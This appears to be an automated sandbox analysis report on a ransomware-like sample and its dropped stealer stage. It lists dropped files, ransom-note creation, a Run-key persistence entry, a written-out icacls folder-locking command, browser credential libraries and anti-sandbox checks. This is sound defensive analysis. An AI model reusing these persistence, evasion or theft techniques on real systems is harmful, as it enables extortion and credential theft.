Source: build2.exe, 0000000E.00000002.443184241.0000000002160000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000010.00000000.440544094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000010.00000000.440042728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000010.00000002.536453071.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: build2.exe, 0000000E.00000002.443184241.0000000002160000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000010.00000000.440544094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000010.00000000.440042728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000010.00000002.536453071.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: build2.exe, 0000000E.00000002.443184241.0000000002160000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000010.00000000.440544094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000010.00000000.440042728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000010.00000002.536453071.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

Code function: 2_2_00412440 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,

2_2_00412440

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7104:120:WilError_01
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Mutant created: \Sessions\1\BaseNamedObjects\d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963user4

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Command line argument: milatawe	0_2_0040A321
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Command line argument: hopevufayid	0_2_0040A321
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Command line argument: 2hB	0_2_0040A321
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Command line argument: kernel32.dll	0_2_0040A321
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Command line argument: WertualProtect	0_2_0040A321
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Command line argument: msimg32.dll	0_2_0040A321
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Command line argument: msimg32.dll	0_2_0040A321
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Command line argument: msimg32.dll	0_2_0040A321

Source: Q5W0I0pzFI.exe	String found in binary or memory: set-addPolicy
Source: Q5W0I0pzFI.exe	String found in binary or memory: id-cmc-addExtensions
Source: Q5W0I0pzFI.exe	String found in binary or memory: set-addPolicy
Source: Q5W0I0pzFI.exe	String found in binary or memory: id-cmc-addExtensions
Source: Q5W0I0pzFI.exe	String found in binary or memory: set-addPolicy
Source: Q5W0I0pzFI.exe	String found in binary or memory: id-cmc-addExtensions
Source: Q5W0I0pzFI.exe	String found in binary or memory: set-addPolicy
Source: Q5W0I0pzFI.exe	String found in binary or memory: id-cmc-addExtensions

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Source: Q5W0I0pzFI.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: Q5W0I0pzFI.exe, Q5W0I0pzFI.exe, 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000008.00000000.396193499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000008.00000000.395607853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000009.00000000.409130512.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000009.00000002.440072220.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000009.00000000.410741803.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 0000000A.00000002.419401145.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 0000000B.00000000.413315089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 0000000B.00000000.417180790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 0000000B.00000002.427127192.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 0000000F.00000002.447804234.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000011.00000000.440924056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000011.00000000.442768730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000011.00000002.450360097.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: \bC:\fupi.pdbp source: Q5W0I0pzFI.exe, 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Q5W0I0pzFI.exe, 00000000.00000000.358112818.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Q5W0I0pzFI.exe, 00000002.00000000.364794208.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Q5W0I0pzFI.exe, 00000006.00000002.398439159.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Q5W0I0pzFI.exe, 00000006.00000000.379315960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Q5W0I0pzFI.exe, 00000007.00000000.381590354.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 00000007.00000002.413612343.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 00000008.00000000.386408473.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Q5W0I0pzFI.exe, 00000008.00000003.536074862.0000000000720000.00000004.00001000.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000009.00000000.403443731.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 0000000A.00000000.403434201.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 0000000A.00000002.418557680.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 0000000B.00000000.409795194.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 0000000F.00000002.445876188.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 0000000F.00000000.420850734.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 00000011.00000000.437834920.0000000000401000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: C:\fupi.pdb source: Q5W0I0pzFI.exe, Q5W0I0pzFI.exe, 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Q5W0I0pzFI.exe, 00000000.00000000.358112818.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Q5W0I0pzFI.exe, 00000002.00000000.364794208.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Q5W0I0pzFI.exe, 00000006.00000002.398439159.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Q5W0I0pzFI.exe, 00000006.00000000.379315960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Q5W0I0pzFI.exe, 00000007.00000000.381590354.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 00000007.00000002.413612343.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 00000008.00000000.386408473.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Q5W0I0pzFI.exe, 00000008.00000003.536074862.0000000000720000.00000004.00001000.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000009.00000000.403443731.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 0000000A.00000000.403434201.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 0000000A.00000002.418557680.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 0000000B.00000000.409795194.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 0000000F.00000002.445876188.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 0000000F.00000000.420850734.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 00000011.00000000.437834920.0000000000401000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: (C:\tuzir\viki_sebagomujocuv\12_lono.pdb source: Q5W0I0pzFI.exe, 00000008.00000003.611613225.0000000000720000.00000004.00001000.00020000.00000000.sdmp, build2.exe, 0000000E.00000000.419696029.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe, 0000000E.00000002.442088434.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe, 00000010.00000000.427162779.0000000000401000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: Q5W0I0pzFI.exe, 00000000.00000002.372586217.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000002.00000000.369557747.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000002.00000000.368447037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000006.00000002.398998992.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000007.00000002.418950342.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000008.00000000.396193499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000008.00000000.395607853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000009.00000000.409130512.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000009.00000002.440072220.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000009.00000000.410741803.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 0000000A.00000002.419401145.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 0000000B.00000000.413315089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 0000000B.00000000.417180790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 0000000B.00000002.427127192.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 0000000F.00000002.447804234.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000011.00000000.440924056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000011.00000000.442768730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000011.00000002.450360097.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\tuzir\viki_sebagomujocuv\12_lono.pdb source: Q5W0I0pzFI.exe, 00000008.00000003.611613225.0000000000720000.00000004.00001000.00020000.00000000.sdmp, build2.exe, 0000000E.00000000.419696029.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe, 0000000E.00000002.442088434.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe, 00000010.00000000.427162779.0000000000401000.00000020.00000001.01000000.00000006.sdmp

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 0_2_0040D238 push eax; ret	0_2_0040D256
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_00428565 push ecx; ret	2_2_00428578
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 6_2_02178F05 push ecx; ret	6_2_02178F18
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Code function: 7_2_02238F05 push ecx; ret	7_2_02238F18
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050D050 push eax; retn 004Dh	8_2_0050D6B5
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050D008 push eax; retn 004Dh	8_2_0050D6B5
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050D028 push eax; retn 004Dh	8_2_0050D6B5
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050D090 push eax; retn 004Dh	8_2_0050D6B5
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050D0A8 push eax; retn 004Dh	8_2_0050D6B5
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050D318 push eax; retn 004Dh	8_2_0050D6B5
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050C4E0 push eax; retn 004Dh	8_2_0050D6B5
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050D550 push eax; retn 004Dh	8_2_0050D6B5
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_00428565 push ecx; ret	8_2_00428578
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050D698 push eax; retn 004Dh	8_2_0050D6B5
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050C960 push eax; retn 004Dh	8_2_0050D6B5
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050C928 push eax; retn 004Dh	8_2_0050D6B5
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050C988 push eax; retn 004Dh	8_2_0050D6B5
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050C9A8 push eax; retn 004Dh	8_2_0050D6B5
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050CB78 push eax; retn 004Dh	8_2_0050D6B5
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050CD60 push eax; retn 004Dh	8_2_0050D6B5
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050CDF0 push eax; retn 004Dh	8_2_0050D6B5
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050CE58 push eax; retn 004Dh	8_2_0050D6B5
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050CF28 push eax; retn 004Dh	8_2_0050D6B5
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050CFC0 push eax; retn 004Dh	8_2_0050D6B5
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050CF90 push eax; retn 004Dh	8_2_0050D6B5

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

Code function: 0_2_0040A04E LoadLibraryA,GetProcAddress,

0_2_0040A04E

Source: mozglue[1].dll.16.dr	Static PE information: section name: .didat
Source: mozglue.dll.16.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.16.dr	Static PE information: section name: .didat
Source: msvcp140.dll.16.dr	Static PE information: section name: .didat

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

System file written: C:\Users\user\AppData\Local\Temp\CR_14C6C.tmp\setup.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	File created: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	File created: C:\Users\user\Local Settings\Temp\CR_14C6C.tmp\setup.exe.wdlo (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\build2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	File created: C:\Users\user\AppData\Local\Temp\CR_14C6C.tmp\setup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	File created: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	File created: C:\Users\user\Local Settings\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe.wdlo (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	File created: C:\Users\user\Local Settings\Application Data\Application Data\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe.wdlo (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\freebl3[1].dll	Jump to dropped file

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	File created: C:\_readme.txt			Jump to behavior
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	File created: C:\Users\user\_readme.txt			Jump to behavior

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Possible FUD Crypter (malicious underground PE packer) detected

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

FUD Crypter parameteres: EnumResourceTypesA, 53, 49, 3, 305

0_2_0040A321

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda" /deny *S-1-1-0:(OI)(CI)(DE,DC)

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: build2.exe, 00000010.00000002.536453071.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Binary or memory string: HGETPROCESSWINDOWSTATIONGETUSEROBJECTINFORMATIONWGETLASTACTIVEPOPUPGETACTIVEWINDOWMESSAGEBOXWUSER32.DLLCONOUT$AVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLLPQXPEZQHKM2D8PZ

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe TID: 6588

Thread sleep time: -900000s >= -30000s

Jump to behavior

Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_0-15487
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_0-15621

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

Thread delayed: delay time: 900000

Jump to behavior

Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Dropped PE file which has not been started: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\CR_14C6C.tmp\setup.exe.wdlo (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Dropped PE file which has not been started: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CR_14C6C.tmp\setup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Dropped PE file which has not been started: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\msvcp140[1].dll	Jump to dropped file
